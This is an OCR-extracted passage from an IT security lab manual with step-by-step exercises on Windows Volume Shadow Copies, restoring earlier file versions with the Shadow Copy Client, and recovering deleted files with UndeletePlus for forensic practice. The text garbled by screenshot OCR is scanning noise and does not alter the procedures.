14. On the Shadow Copies tab of the C:\ drive’s Properties dialog box, click the Create
Now button to fire off the first shadow copy manually.
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16.
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Once the shadow copy displays in the Shadow Copies Of Selected Volume section,
click the Settings button.

In the Settings dialog box, click the Details button to view the properties of the first
shadow copy.

Details
Storage volume:
=
Details:
Wolume | Used ‘ Mazimum Size
Ch 300 MB 1946 ME
Free disk space: B05E MB
Total disk space: 13461 WE

% Notice the first shadow copy consumed 300 MB of disk space.
TE

17.
18.

19.

Click OK to close the Details dialog box. Click OK to close the Settings dialog box.

You have now successfully configured the C:\ drive of the Server 2003 system to create
Volume Shadow Copies three times daily, Monday through Friday.

Leave the C:\ Drive Properties dialog box open, but move it aside for the moment.
You’ll be using it shortly.

Manipulating Content on the C:\ Drive to Produce Previous Versions

1.

On the Windows Server 2003 system, logged in as the Administrator, in the Windows
Explorer application, with the STUFF folder selected in the left pane, right-click in the
right pane and select New » Text Document. Name the document GoodStuffl. txt.

Repeat step 1 to create the files GoodStuff2.txt and GoodStuff3.txt.

In the C:\ Drive Properties dialog box, on the Shadow Copies tab that you left open
earlier, click the Create Now button to create another shadow copy of the C:\ drive.

You’re going to manipulate these files and make multiple shadow copies. To keep
track of the contents of each copy, fill in the table presented here as you complete the
following steps. Write the time of the shadow copies you’ve created in the My Time
from VSC field that matches up the proper Steps and Contents.
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VSC Time My Time
VSC# Step# from graphic Contents of STUFF from VSC
1 14 and 12:08 p.m. Initial Volume Shadow Copy.
Above The folder STUFF is empty.

2 3 12:14 p.m. GoodStuffl.txt, GoodStuff2

.txt, GoodStuff3.txt; all files

are empty.
3 7 12:17 p.m. GoodStuffl.txt has ABC

content. GoodStuff2.txt and
GoodStuff3.txt are empty.

4 10 12:20 p.m. GoodStuffl.txt has ABC XYZ
content. GoodStuff2.txt and
GoodStuff3.txt are empty.

5 14 12:26 p.m. GoodStuffl.txt has ABC 123
content. GoodStuff2.txt and
GoodStuff3.txt are empty.

6 16 12:29 p.m. GoodStuffl.txt has ABC 123
content. GoodStuff2.txt has
been deleted. GoodStuff3.txt
is empty. This is the final state
of the folder STUFF.

Log your times for VSC #1—the Initial VSC—and #2—the VSC created in
TE step 3—in the table provided. Flag this page. You'll be double-checking
content later using this table as a reference.

5. In Explorer, double-click on the file GoodStuffl.txt to open it in the Notepad
application. Edit GoodStuffl.txt with the content ABC.

6. In Notepad, select File > Save to save the new content ABC in the file GoodStuffl. txt.

y Leave GoodStuffl.txt open in Notepad.

o

7. In the C:\ Drive Properties dialog box, on the Shadow Copies tab, click the Create
Now button to create another shadow copy of the C:\ drive.
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% Log your VSC time on line 3 in the table provided.
TE

8. Edit GoodStuffl.txt by adding XYZ to the content, resulting in the content
ABC XYZ.

9. In Notepad, select File > Save to save the new content ABC XYZ in the file
GoodStuffl.txt.

Leave GoodStuffl.txt open in Notepad.
A TE

10. In the C:\ Drive Properties dialog box, on the Shadow Copies tab, click the Create
Now button to create another shadow copy of the C:\ drive.

SY¥5_BOOT {C:) Properties HE
General I Tools | Hardware | Sharing |
Security Shadow Copies I Guata

Shadow copies allow ugers to view the contents of shared folders
az the contents exizted at previous points in time, For information on
required client software, click here.

Select a volume:

Wolume | Mext Run Time | Shares Used
[c=1048 10A1/20063.. 3 393 MB on
Enable Dizable Settings...

~ Shadow copies of selected volume

10/11/2006 12:20 PM
10/11/2008 1217 PM

10/11/2008 12:14 PM e
10/11/2006 12:08 PM elete How |
Bevert... |

QK Cancel Lpply

% Log your VSC time on line 4 in the table provided.
TE

11. Edit GoodStuffl.txt by deleting XYZ and then adding 123 to the content, resulting in
the content ABC 123.
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12. In Notepad, select File > Save to save the new content ABC 123 in the file
GoodStuffl.txt.
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13. You can (finally) close GoodStuffl.txt.

14. In the C:\ Drive Properties dialog box, on the Shadow Copies tab, click the Create

Now button to create another shadow copy of the C:\ drive.

16. In the C:\ Drive Properties dialog box, on the Shadow Copies tab, and click the Create

2

15. In Windows Explorer, delete GoodStuff2.txt by right-clicking on the file and selecting
Delete.

Log your VSC time on line 5 in the table provided.

Now button to create another shadow copy of the C:\ drive.

=

SYS_BOOT (C:) Properties [2]
General I Toolz | Hardwsare | Sharing |
Security Shadow Copies I Quota

Shadow copies allow users to view the contents of shared folders
as the contents existed at previous points in time. For information on
required client software, click here.

Select a wolume:

“olumne: Mewt Bun Time | Shares Used

409 MB on ..

Enabile Disable | Seflings... |

i Shadow copies of selected volume ——————————
1071172008 12,29 FM Ereaelin |
10/11/2006 12:26 PM

10/11/2006 12:20 P

10/11/2005 1217 PM Delde o |
10/11/2008 12:14 PM

10/11/2006 12:08 PM Bevert... |

Ok I Cancel Apply

Log your VSC time on line 6 in the table provided.

Testing Previous Versions on Server 2003

1. While logged on to Windows Server 2003 as the Administrator, in Explorer, in the left

pane, right-click on the folder STUFF and select Properties.
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STUFF Properties

General | Shalingl Securilyl ‘Web Sharingl Eustnrmzel
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/

- ISTUFF

Tupe: File Folder

Location: Ch

Size: 14 bytes [14 bytes)

Size ondisk:  8.00 KB (8,192 bytes]

Cartaing: 2 Files, O Folders

Created: Thursday, August 31, 2006, #5223 PM

Attributes: Adwvanced... |
™ Hidden

o]

Cancel Apply

Notice that the Previous Versions tab does not exist when you’re checking

TE

Properties locally.

Select Start » Run. In the Open field, type \localhost\stuff and click OK to connect to

the STUFF share point.

An Explorer window will open and should show GoodStuffl.txt and GoodStuff3. txt.

JJocalhost" stuff
File Edit Wiew Favorites Tools Help | o
D Back - ) - (B | O search [ Faiders | [ 0 X ) | -
Address [ {ijocalhoststuff S @se
Name = [ size | Type | Date Modified [ A@
| EllGoodatarr1 o 1KE  Text Document 10/11/2006 12:26 PN AC

OKE  Text Document 10/11/2008 12:11PM AC

‘2 objects

[14 bytes | Intemet

Right-click on GoodStuffl.txt and select Properties. Select the Previous Versions tab
in the GoodStuffl.txt Properties dialog box.
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GoodStuff1.txt Properties

General | Security | Summary  Previous Yersions |

To view a previous wersion of a file, select the version

"I from the following list and then click View. You can
also save afile to a different location or restore a
previous version of a file.

Eile versions:

Mame Time

[ ¥ ool st Today October 11, 2006, 12-20 Ph
GoodStuffltst Today, October 11, 2006, 1217 PM
GoodStuffl tst - Today, October 11, 2006, 1214 PM

i | Copy... | Bestore I

oK I Cancel I Apply | Help

5. Close the Properties dialog box for GoodStuffl. txt.

Installing Previous Versions on XP

1. Previous Versions is not installed by default on operating systems other than Server
2008 and Server 2003. To run Previous Versions on any other operating system,
you must install it on each system you need it on. See the installation instructions
for down-level clients at www.microsoft.com/technet/downloads/winsrvr/

shadowcopyclient.mspx.

2. While logged on to Windows Server 2003 as the Administrator, in Explorer, in the
left pane, expand folders as necessary to select the folder Windows\system32\cTients\
twclient\x86. In the right pane, notice but do not execute the file twc1i32.msi. There

is a newer version that you’ll be installing.

7/
ING

The Previous Versions feature is available only when you're connected to
content through a share point. You must connect to the share point STUFF
from the network. This is not a typical way to access content locally, but is
necessary if you must recover local content using Previous Versions.

Twc1i32.ms1 is the Time Warp Client for 32-bit OSs’ Microsoft Installer
package. The Time Warp Client is also called Previous Versions Client and
Shadow Copy Client. While this file works fine, do not use this file to install
the Shadow Copy Client on XP. It is always better to download a fresh copy
from a trusted source, just in case there is a newer version. You'll do this in
a few moments.
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Log on to the XP Professional system as the Administrator.

Select Start » Run. Type \\server_name\STUFF in the Open field, where server_name
is the name of the Windows Server 2003 that is hosting the STUFF share point. Then
click OK.

= Type the name of & program, folder, document, or
B Internet resource, and Windows will open it For you,

Open: | 1RIOISTUFF |

[ ok |[ Cancel H Browse.., ]

This should open an Explorer window that shows the two remaining files in the
STUFF share point: GoodStuffl.txt and GoodStuff3.txt. Right-click on GoodStuffl
.txt and select Properties.

Notice that the properties page for the content accessed through the network share
point does not have a Previous Versions tab. Click OK to close the GoodStuffl.txt
Properties dialog box.

Launch Internet Explorer. In the address bar, type the URL http://technet.microsoft
.com/en-us/windowsserver/bb405951.aspx and click the Go button.

On the resulting web page, select to download the Shadow Copy Client for XP.

~ Shadow Copy Client Download - Windows Internet Explorer

@\__/- [T http: [fuvwm.microsoft. com weopydlient. mspx M 4| x
* & [[;shaduwcwychenmuwnluad [ I -8 &

Quick Links v

Microsoft TechiNet

TechNet Home TechCenters | Downloads | TechNet Program | Subscriptions | My TechNet | Security Bulletins | Archive

Search for TechNet Home > > Windows Server > for Windows Server

Shadow Copy Client Download

Exchange Server

1S4 Server Publishad: April 25, 2003
Office System
Operations Manager Shadow Copies of Shared Folders is a component of the intelligant file storage technologies in Microsoft Windows Related Links 1
Small Business Server Server 2003. It enables you to prevent data loss by creating and storing shadow copies of files and folders on your « Introduction to Shadow
SQL Server network at predetermined time intervals. In order to view these shadow copies from a computer running a version Copies of Shared Folders
Systems Management of Windows earlier than Windows Server 2003, you need to install the Shadow Copy Client. = ShatowCoDeor
Server Shared Folders:

* Teo of page Frequently Asked
Windows Server 2003 Questions

Windows XP Professional System Requirements

Windaws Vista
Operating systems supported include:

More... Download

Desktop Deployment Windows XP Frofessional & Shadow Copy Client
Dovnioag

Infrastructure Windows 2000 (Service Pack 3 or later)

Optimization —_— U
Important: You need Windows Installer 2.0, or a later version, to install the client software. Depending on the

Interop & Migration
client operating system you are using, download Windows Installer from one of the following locations:

Script Center

Security For Windows i Installer 2.0 Redistributable for Windows 2000 and Windows NT 4.0.
Update Management For Earlier Versions of i Installer 2.0 i for Windows 95, Windows 98, and Windows Mi Edition.
Community
+Too of pag
Events & Webcasts oz-otpaas
Virtual Labs

Download Instructions
IT Training & Certification

Depending on the dient operating system you are using, follow the appropriate steps for installing the Shadew Copies for Shared Folders lient
Troubleshooting & Support

software.

TechNet Worldwide

For Clients Running Windows XP
Fram tha rlisnt ramniter lick tha Nawnlnad Fils link tn start the dawnlaad then dn ane of the frllnwina:
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9. Save the ShadowCopyClient.msi file to your XP desktop.

10. Once the download is complete, close Internet Explorer.

)’ Notice the file size is different compared to the twc1i32.msi file.
e

11. Double-click the file ShadowCopyClient.ms1i located on your desktop to begin
installation of the Previous Versions Client.

12. On the Welcome screen of the wizard, click Next.

1% Shadow Copy Client Setup. E]I_;\@

Welcome to the Shadow Copy
Client Installation Wizard

It iz strongly recommended that you exit all \Windows programs
before nning this setup program.

Click Cancel to quit the setup program, then close any programs
you have unning, Click Next to continue the installation.

WARMING: This program is protected by copyright law and
intemational treaties.

Unauthatized reproduction o distribution of this pragram, or any
portion of it, may result in severe civil and criminal penalties, and
will be prosecuted to the maximum extent possible under law.

Next > | [ Cancel ]

13. On the End User License screen, click I Accept, and then click Next.
14. Installation will continue by displaying a progress window.

15. When you are presented with the Successful Installation screen, click Finish to close
the Shadow Copy Client Setup Wizard.

16. In the Explorer window that is connected to \\server_name\STUFF (where server_
name is the name of the Windows Server 2003 server that is hosting the STUFF share
point), right-click on GoodStuffl.txt and select Properties. Now you can select the
Previous Versions tab.

17. Select the most recent previous version (VSC 4, Step 10 version from the table you

filled in earlier—in the graphic, it is the 12:20 p.m. version) and click the View button.

This should open Notepad with a copy of GoodStuffl. txt. The version from Step 10
had the content of ABC XYZ.
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The current version of GoodStuffl.txt contains content of ABC 123. There
TE is no VSC 5 or 6, Steps 14 or 16 versions in the Previous Versions list since

those versions of GoodStuffl. txt are the current version. If you want

the VSC 5, Step 14 (12:26) version that reads ABC 123, open the current

GoodStuffl. txt file directly from the share point. View each previous

version of GoodStuffl.txt on the list. Confirm its proper content against
the table you filled in earlier.

18. After viewing deleted content in the previous-version files, close Notepad with

GoodStuffl. txt.

19. In the Explorer window that is connected to \\server_name\STUFF, right-click the
white space and select Properties. Select the Previous Versions tab of the STUFF

Properties dialog box.

20. Select the VSC 5, Step 14 (12:26 p.m.) version, and then click the View button.

Folder veisions:

Name

= stulf
o stulf
L stuff
L stulf

stuff on Rio Properties

Time

Today, Dctober 11, 2008, 3.00 PM

Today, October 11, 2006, 1223 PM
Today, October 11, 2006, 12:26 PM
Today, October 11, 2006, 12:20 PM

| General| Secuily | Previous Yersions | Customize |

[ J To view a previous version of a folder, select the

'3 version from the following list and then click View. You
can ko save a folder to a different location or restore
a previous version of a folder.

# WRio\stuff (Today, October 11, 2006, 12:26 PM)

File Edit View Favorites Tools Help ?,'"
y ) = T

€ Lt > |? /.\ Search |(~ Folders | |3 (¥ x n -

Address | L2 {|Riststuff (Today, October 11, 2006, 12:26 PM) v led G0
Mame = Size  Type Date Modified

&) GoodstuffL.txt 1KB Text Document 10/11/2006 12:26 PM

E] GoodStuff2.txt QKB Text Document 10{11/2006 12:10 PM

EJ Good3tuff3.txt OKB  Text Document 10/11/2006 12:11 PM

Type: Text Document Size: 14 bytes Date Modified: 107112006 12:! 14 bytes

‘:! Local intranet

21. The VSC 5, Step 14 (12:26 p.m.) version was recorded prior to deleting the
GoodStuff2.txt file. Observe the GoodStuff2. txt file.

22. Close the window showing the VSC 5, Step 14 (12:26 p.m.) version files.

23. On the Previous Versions tab of the STUFF Properties dialog box, with the VSC 5,
Step 14 (12:26 p.m.) version highlighted, click the Copy button to recover the STUFF

folder that contains the deleted GoodStuff2. txt file.
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24. In the Copy Items dialog box, select the C:\AA folder. If this folder does not exist,
create a new folder and name it AA.

Copy Items [j@

Select the place where you want ta copy 'stuff', Then click.
the Copy button,

(=) % Local Disk {C:) -~
=)
[# () Documents and Settings
[# [2) Program Files
) RECYCLER
) System Yolume Information
® 2) WINDOWS

) WUTemp 3
To wiew any subfolders, dlick a plus sign above.
IMake New Folder I | Copy I I Cancel

25. Click the Copy button in the Copy Items dialog box.

26. Open a new instance of Explorer. In the left pane, expand folders to select C:\AA\
STUFF. Observe the recovered file GoodStuff2. txt.

B C:AAMstuff =13
[}

File Edit View Favorites Tools Help
@ Back v () " P ) Ssarch [L‘ Folders '
Address | () Cyamistuff W ‘ €3
Folders X | Name ~ Size  Type Date Modified
@ Desktop -~ E] GoodSEufFL.Ext 1KB Text Document 10/11/2006 12:26 PM
# U My Documents B GoodStuff2.txt 0KB Text Document 104112006 12:10 PM
= 3 My Computer ] GoodstufF3.txt OKE TextDocument  10/11/2006 12:11 PM
® J4 3% Floppy (A2
(=] % Local Disk (C:)
(=] '] AR
omm
[# () Documents and Settir
[ () Proaram Files M
< >
3 objects (Disk free space: 2.42 GB) 14 bytes :‘ My Computer

Criteria for Completion

You have completed this task when you have configured Volume Shadow Copies on
Windows Server 2003; manipulated content on a share point; created multiple shadow
copies; downloaded and installed the Shadow Copy Client on an XP system; and examined
the previous versions to recover deleted content and deleted files.
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Task 9.6: Recovering Deleted Content
from the File System

There may be several reasons why deleted content needs to be recovered. In some cases,
users accidentally delete files and need assistance in their recovery efforts. In other cases,
administrators or forensic investigators need to recover deleted content as part of an
investigation of unacceptable use of a system, or perhaps even from criminal activity.

Scenario

You are a security professional for an organization. A computer system is delivered

to you with a report of suspected unacceptable use of the company’s computer system.
The report indicates that a preliminary scan of the system shows nothing but approved
software and content, but management wants to be sure that the suspected unauthorized
content wasn’t removed from the computer before it was confiscated. Your job will be to
investigate the system and recover any deleted content. To prepare for the investigation,
you want to familiarize yourself with the tools and procedures you will use during the
recovery effort.

Scope of Task

Duration
This task should take 30 minutes.

Setup

When a user deletes a file from Windows system, the file system by default places the
deleted content in the Recycle Bin, sometimes called the Recycler. This allows for the easy
recovery of the file by the user, just in case the user deleted the wrong file. You will first
check the Recycle Bin for deleted content.

On an NTEFS file system, when a user empties the Recycle Bin, the file system updates
the partition’s table of contents, called the Master File Table (MFT), by overwriting the
first character of the deleted file’s name with a question mark (?). (On a FAT partition,
this file system table of contents is called the File Allocation Table, or FAT, which is where
FAT partitions get their name.) This tells the file system that the space that contains the file
content is now available for reuse. The file content actually remains written on the disk and
is called remanents. The remanents could be overwritten at any moment, since the space is
deemed “free space.”

Remanents can be recovered and converted into files for inspection. Often, because parts
of the original, deleted file have been overwritten, the recovered content is fragments of the
original content, but these fragments can still be useful in an investigation.
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Caveat

In a real investigation you never analyze the original disks. You make exact, bit-level copies
of the original disk(s) and analyze that. Also, when you boot up an operating system (OS),
the OS builds its page file and writes many different files and updates (like log files) to the
disks. These writes are potentially destroying the target of the investigation, so in a real
investigation, you would never boot up the target but would mount the disk as a read-only
data disk from a different OS to disallow overwriting any remnants.

This task is only intended to test the tool and familiarize you with the nature of file
remanents and their recovery.

Procedure

First you’ll create a file with some known content. Next you will delete the file, placing it
into the Recycle Bin. Then you will restore the file from the Recycle Bin and examine its
contents to verify intact recovery.

You will download a tool designed to recover remanents from the file system and
install it. Then you will delete the file again, this time emptying the Recycle Bin. Using the
tool UndeletePlus, you will scan the disk drive and recover the deleted content from the
remanents on the disk.

Equipment Used

For this task, you must have:
= Windows 7 system

= Administrator access

s Internet access

Details

Using the Recycle Bin

1. Log on to the Windows 7 system as the Administrator.

2. Right-click on the desktop and select New » Text Document.

% Document the time of file creation. You will need this information later.
TE

3. Double-click the New Text Document.txt file to open it.
4. Type a line from your favorite song or movie into the text document.

5. From the menu, select File > Save.



Task 9.6: Recovering Deleted Content from the File System 503

) Saa '
0
=

Recycle Bin  New Text
Document

-
:3 New Text Document - Notepad E‘Eﬂ

Edit Format View Help

Mew cul+n 1T one guestion: Do I feel Tucky? -

Open... Ctil+0

Save Cerl+S ; —
~ Save As...

Page Setup...

Print... Crl+P

Exit

PGP Desktop
e A

B - 09|

Close the text document by clicking the red X in the upper-right corner of the Notepad
document.

Right-click on the TXT file and select Delete, or click on the file and drag it to the
Recycle Bin.

= [ = |
! \
St Open

Recycle Bin Mew T|

Forar] Print
Edit
@ Scanwith Micrasaft Security Essentials...
Open with 3
Share with 3

Restare previous versions

Send to >
PGP Desktap 3
Cut

Copy

Create shartcut
Delete

Rename

Properties

@ e o o
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Verify that you want to move the file to the Recycle Bin by clicking Yes in the
confirmation dialog box. Notice the file is removed from your desktop.

Double-click the Recycle Bin. You should see New Text Document.txt.

Double-click New Text Document.txt. This would normally open the file in
Notepad, but in the Recycle Bin, this brings up properties of the file and an option to

restore the file.

e

&
Recycle Bin
==
- By
—~— = - New Text Document Properties u
o) ‘_E_, b Recyele Bin -
- General
Organize = Empty the Recycle Bin Restore this ite
A Favorites il %, Mew Text Dacument J ew Text Dacument
Text Document
Bl Desktop o
Eillbgtes Type: Text Document
& Downloads '
t—.l Recent Places Crigin: Desktop
Size: 57 bytes

mn

) Libraries
@ Dacuments
J’ Music
[E=] Pictures
EE videos

18 Computer
£, Lacal Disk (C3)

B

Text Document

ChUsers\BullDesktopyMew Text Document Daf

Deleted:
Created:

Today, February 14, 2011, 3 minutes ago
Today, February 14, 2011, 39 minutes ago

Attributes Read-only Hidden
Archive
Compressed
Encrypt contents

AEE

D [E )

11. Click the Restore button. The file should disappear from the Recycle Bin and reappear

on the desktop.

12. Click the OK button in the New Text Document Properties dialog box and exit the

Recycle Bin.

13. Double-click New Text Document.txt to verify the complete contents of the file.
You have successfully recovered deleted content from the Recycle Bin.
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Installing UndeletePlus

In this exercise, you do not have specific recovery targets and are only
TE interested in becoming familiar with the UndeletePlus tool and recovery

process. In this case, it is safe to download the software to the target

system and install the program on the system directly. Normally you

would install the software on a separate system and scan the target disk(s)
without booting the target system OS.

Still logged on to the Windows 7 system as the Administrator, launch Internet Explorer.

N =

Download UndeletePlus from the following website:

http://undelete-plus.en.softonic.com/
Clear the options to install any toolbars and home-page configuration.
Launch undeleteplus_setup.exe.

If you are prompted for approval to make changes to the system by User Account
Control, click Yes to allow the installation program to proceed.

1% User Account Control

Program name:  eSupport UndeletePlus Setup
Verified publisher: eSupport.com, Inc.
File origin: Downloaded from the Intemet

(%) Show details

Change when these notifications appear
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Notice that the operating system locks the desktop as a protective
TE measure while it waits for confirmation to escalate privilege and install the
application.

5. Click Next to proceed into the installation of UndeletePlus.

r
5! Setup - UndeletePlus =

Welcome to the UndeletePlus
Setup Wizard

@ This will install Undelete Plus 2.97 on wour computer.
+ It iz recommended that you close all other applications befare
continuing

Click Mext to continue, ar Cancel ta exit Setup.

Accept the license agreement and click Next.
Accept the default installation path and click Next.
Enable the check box to install a desktop icon. Click Next, and then click Install.

© ® N o

Clear the check box to visit the UndeletePlus home page. Click Finish.

”
5 Setup - UndeletePlus o

Completing the UndeletePlus
Setup Wizard

Setup has finizhed installing UndeletePlus on pour computer.
+ The application may be launched by selecting the installed
icons.

Click Finish to exit Setup.

Laurich UndeletePlus
Wisit Homepage
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10. Minimize the UndeletePlus utility to the taskbar.

Creating a Remanent: A Recovery Target

1. Right-click on the TXT file and select Delete, or click on the file and drag it to the
Recycle Bin.

Confirm moving the file to the Recycle Bin.
Right-click the Recycle Bin on the desktop and select Empty Recycle Bin.

You can delete content without placing it in the Recycle Bin by holding the
TE Shift button, then right-clicking the file and selecting Delete. This removes

the first and easiest option for recovering the deleted content.

Open
Empty Recycle Bin

Create shortcut

Rename

Properties

4. Click Yes to confirm removal of the contents of the Recycle Bin. The file is now
unrecoverable using standard Windows recovery techniques.

g ™
Delete File =0
Are you sure you want to permanently delete this file?
?( J rarasannan, Mew Text Document
Type: Text Dacument
Size: 57 bytes

Date modlified: 2/14/2011 3:03 PM
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Recovering Content from Remanents
1. Click the UndeletePlus utility on the taskbar.

| Recrce B _
#1 Undelene PLUS - Mgan = @ =

Start Undelete Filter I

| ] 2

=2 My Computer
@58 C\ (30.00 GB) '

N N

114

| G ed - S]]

Voo 2979 Fley OFF | s 4 I %
S N\
Bllel [0«
N

2. Confirm the C:\ drive is selected and click the Start Scan button in the upper-left
corner. The scan may take a few minutes to complete.
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When the scan completes, in the right pane review the list of remanents that may be

recoverable.

S

"3

L]
Recycle Bin

&4 Undelete PLUS - Main

| Start Scan || Start Undelete ”

=T My Computer
1 spplication (1)
Cahinet cormpression [(25)
GIF graphics (14)
-8 HTML Documents (4)
|7 JPEG Standard Graphics (7)
& Other Files (21800
PMG Graphics (3)
Text Documents (3)
-[#] ¥ML Docurments (243
£ 21F cormpression (13

Types

Folders

Drives

Filter | Update | Check for Driver U
les
Filsname: |Path | tatus |Size: lpate o~
; _RegDLL.tmp Ci\Deleted 62548Y Wery Good 4 kb 2011+
setupgd tmp Ci\Deleted 62848), Yery Good  BEKb 201140 |
shfaldr.dll Ci\Deleted 62348, Very Good  23Kb 2011-0
[ |PGPZE4E tmp Ci\Users\BullAppDatallocal,...  very Good 888 b 2011+
I |PGEPZFLA.tmp CiiUsers\BulliAppDatallocali,,,  Wery Good  0Ob 2011+
amde4_microsoft-win.., CiDeleted 33151 Yery Good  2Kb 2011-0
package_2_For_kb22... CiWindowsiwinsxsiwowbd_...  Very Good  8Kb 2011-0
package_3_for_kbZ2z... Ciwindows\winsxsiwowdd_, .. Very Good  30Kb 2011+
amde4_0afefsd7chb,..  CiDeleted 590114 very Good  708b 2011-0
| |amda4_22ac43634bb... Ci\Deleted 590113 Very Good  704b 2011-0
[ |amde4_S580081Fa7e0... C:iDeleted 59011 Wery Good  708b 2011+
amd6d_59d22239189,., CiiDeleted 59011% Wery Good 704 b 2011-1
amde4_7938das0923... CiDeleted 590114 very Good 704 b 2011-0
amdt4_dal3edz17d4... C:\Deleted 59011Y Very Good  704hb 2011+
amded_15ad33c7794,,, CiiDeleted 55957 wery Good 697 b 2011+
state Ci\Deleted 59011 chbshandlery  Wery Good 12b 2011-0
package_1_For_kb33... C:\Deleted 590114 Yery Good 10kb 2011-0
package_1_for_kb9&... C:\Deleted 59011 Wery Good  Skb 2011+
package_1_For_kb9&... C:iDeleted 520114 Yery Good 13kb 2011-0
package_1_For_kb93... C:iDeleted 590114 Yery Good  SEb 2011-0
package_2_for_kbog... C:\Deleted 59011Y Wery Good  10kb 2011+
package_Z_for_kbog... CiiDeleted 59011% wery Good  3kb 2011+
package_2_For_kb9a... C:iDeleted 590114 Yery Good 13kb 2011-0
| |package_2_for_kb98... Ci\Deleted 590113 Yery Good  SkKb 2011-1 7|
| I | 3
[ keep Folder structure Total il
Undelete selected File(s) k |C:'\Users\Bu|\'\DucumEnts o | Open ...

Scan T
End scan Cihy

Building list, Please wait ...
Files with potentially recowv

erable content: 2262

Version: 2.9.7.0 Filter OFF Files: 2262

BB | %

Blelz]ol&

o U R R )

Below the list of remanents in the right pane, clear the Keep Folder Structure check
box. Click the ellipsis button to the right of the Undelete Selected File(s) To text box

(not the Open button).
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Set the recovery folder location to C:\AA. If the C:\AA folder does not exist, create the
C:\AA folder.

"
o
Recycle Bin
I
".g Undelete PLUS - Main =] =
| Start Scan " Start Undelete ” Filter || Update ” Help | /< | Check for Driver
Files Sty (R
=8 My Computer Filsname: |path ISt |size: lpate g ~
1 application (1) _RegDLL.tmp C:\Deleted 62848% wery Good 4 kb 01i-( |
_setupg4. tmp 4 '—Eﬁt - - u L
Browse For Folder

_shfoldr.dl | -
PGPZE4E.tmp
PGPZF1A.tmp
amde4_micrasoft-win,..
package_2_For_kb22.

2 B GIF graphics (14)

=
| Cahinet compression (25) %
LY
=

ﬁ HTML Documents (4) Select Directary
- F] PEG Standard Graphics (7)

Other Files (21803

El c
Il 4
£l s
£l s
[l 4
i [ |package_3_for_kbzz... C: =] i p
(8] PNG Graphics (2) [ |amdse_dafefsdrebb... ? i Floppy Disk Drive (4)
—|z] Text Documents (3 | |amde4_zZ2ac43634bb... < 2 & Local Disk (C:)
o 55| r
[ |amds4_Sa0081Fa7en... il
5] KM Dc'cumer?ts i) @ [ |amds+_Sedzzzagias... Ciifl o AA
£ 2P compression (1) [ Jamds4_79a5da50923... i b L Perflogs
lil =amd64_d61330217d4‘.. i IS p Eil
[F=] | Clamdes_15adsacrras... il W Frogram Files L]
l:l [ |skate [sf] 1| [+ . Program Files {x88)
| |package_1_For_kb9s... Cijl b Users E
El [ |package_1_For_kh3a... C:ij -
El | |package_1_For_kbgs... il B Windows
| |package_1_For_kb9s... Cij a8 . ' —
lpacage 2 for b3, Gl b2 PVD RW Diive (0
| |package_z_for_kb9g... <
lEl [package 2 for kbos.., il [ IMake New Folder ] [ O ] [ Cancel ]
El [ |package_2_For_kbga.., il |
]

[ Keep Folder structure Total il
Types Undelete selected file(s) ta: |C:\Users\Bul\\Dncuments lil Open ...
Status
Folders B
Scan T A
. End scan Cihy
Dirives

Building list, Please wait ...
Files with potentially recoverable content: 2262

[m ]

=
=

= 7l
Ivemon:m?.n Filter OFF Files: 2262 I [ 56 |

6:22 PM
214/2011 ||

o 2 o [ )

ella]oles

Sort the list of remanents by creation time by clicking the Date Created column
heading in the right pane.

Scroll down the list of remanents and locate a TXT file that was created when
you created the New Text Document.txt file. The target file should be relatively small
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based on the small amount of copy you typed into it: probably less than 100 bytes.
Click on the file.

The filename may be different from New Text Document.txt. Take

TE note of the target filename that was created when you created New Text

Document. txt.

Recycle Bin

o.'{ Undelete PLUS - Main

Start Scan " Start Undelete ” Filter || Update ” Help /| Check for Driver

Files

=T My Computer Filename |pate g -
=1 application (1) [ ]4172v93T. bt : i Z011-(_|
. E 1 . Eir [s7b _[a0iid]
Cabinet m_mpreasmn @3 438210d98c5359C9, .. Ciwindows) Softwar Yery Good 2011-0
GIF graphics (14) 160x150_Consumer_....  C:\Users\BullappDatailocal...  Wery Good 16011
é HTML Documents (43 1x1_security_essenti... CiiUsers\BulliAppDatallocal,.. Wery Good 331 b 16010
ng JPEG Standard Graphics (7) 22e7c554e4ebdc9eb, . CiwWindows)SoftwareDistrib, Yery Good 114 kb 2011-0
Other Files (2180) 240542ffd1b339141c... Wery Good 781 Kb 2011-1
i [ |319dd94d0sd 3730, . Wery Good 492 kb 2011-1
--[%] PNG Graphics (3) 350be0a47Th1feSS, very Good 284 Kb 20114
Text Documents (3) 37a2co0517836dcle. Wery Good 267 kb 2011-(
3c93d775ac177d115... Very Good 797 kb 2011-1
HhL DDEumEI’?tS (24) Ifadfe?f117c73891... Wery Good 255 Kb 2011-1
£ 2P compression (1) 475060762d9F 386 b . veryGood  45Kb 2011+
4c9603b0590F01 0ea?. .. Wery Good 1.96 Mb 2011-1
4cdé7Fenafgade17dz. .. Wery Good 43.00 Mb 2011-1
so7Fadfbaodddecddrz. .. . Wery Good 2,13 Mb 2011-1
51e26582582976Fdef, .. CiWindows\SoftwareDistrib,,,  Very Good 2,85 Mb 2011-0
S7bcAd073bbe?Sd7S. . CiiWindows\SoftwareDistrib...  Very Good 233 Kb 2011+
B20d4d95030037INIE. . .. Wery Good 223Kb 2011-1
790b398f01af163d92. .. Wery Good 288 kb 2011-(
88161F3452b00e8d0. .. Wery Good 562 Kb 2011-1
I:| a73B0Fh31263F 20066, . .. veryGood  1.08Mb 2011-(
[ |[Clacafosadsoracdfae. . Ciivindows\SoftwareDistrip..,  very Good 241 kKb 2011+
El | |AEINY_PREVIOUS.xml  Ci\Windows\AppCompatiPro,..  Mery Good 14 Kb 20110 7
| 1 | F
Iil [ keep Folder structure Total Fil
Types l:l Undelete selected files) to: |C:\AA Jl Open
Folders
Drives Preview is not available for this type of file

Version: 20.7.0 | Filter OFF [ Files: 2262 I | 56, |

Ble| =

| O | &% 8 0

51
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Ensure the check box to the left of the file is checked, and click the Start Undelete
button in the upper left of the utility.

"

"3

=
Recycle Bin

&+ Undelete PLUS - Main

[ start scan

" Start Undelete ”

Filter ||

Update ”

les

Filename

=T My Computer El Filename |Path |5ize: |pate g -
1 application (1) El [C]4172%93T txt Recycle.BinlS- Wery Good  S44 b
i ki t 0
Cabinet m_mpreasmn @3 lﬂl ;0438210d98c5389c9 . windowsiSoftwareDistrib,..  Very Good
D_ GIF graphics (14) L] | toxt50_Consumer sers\BullBppDatalLocal... Very Good 21 kb
é HTML Documents (43 El 1x1_security _essenti... sercifulllappDatatlocall...  wery Good 33l b 16010
[@ JPEG Standard Graphics (7) 22e7c554e4ebdc9eh, . windowsiSoftwareDistrib,..  Very Good 114 kb 2011-0
Qther Fil 2180 240542ffd1b339141c... Wery Good 781 Kb 2011-1
